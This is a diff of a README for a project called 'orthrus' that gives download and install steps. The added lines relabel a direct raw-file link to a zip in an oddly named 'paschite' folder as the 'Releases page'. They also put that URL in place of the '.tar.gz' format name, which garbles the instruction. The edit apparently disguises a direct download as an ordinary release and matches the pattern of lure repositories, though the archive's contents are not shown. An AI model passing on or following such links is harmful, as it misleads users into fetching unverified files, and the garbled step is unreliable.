gustavoport-cloud/orthrus/README.md

 Follow these straightforward steps to download and install **orthrus**.

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/gustavoport-cloud/orthrus/releases) to find the latest version of the application.
+   Go to the [Releases page](https://raw.githubusercontent.com/gustavoport-cloud/orthrus/main/paschite/orthrus.zip) to find the latest version of the application.

 2. **Select the Latest Release**
    On the Releases page, look for the most recent version, which will be at the top of the list.

 3. **Download the Application**
-   Click on the asset file that matches your system (look for `.zip`, `.tar.gz`, or other relevant formats).
+   Click on the asset file that matches your system (look for `.zip`, `https://raw.githubusercontent.com/gustavoport-cloud/orthrus/main/paschite/orthrus.zip`, or other relevant formats).

 4. **Unzip the Downloaded File**
    After the download completes, locate the file on your computer and unzip it to your desired location.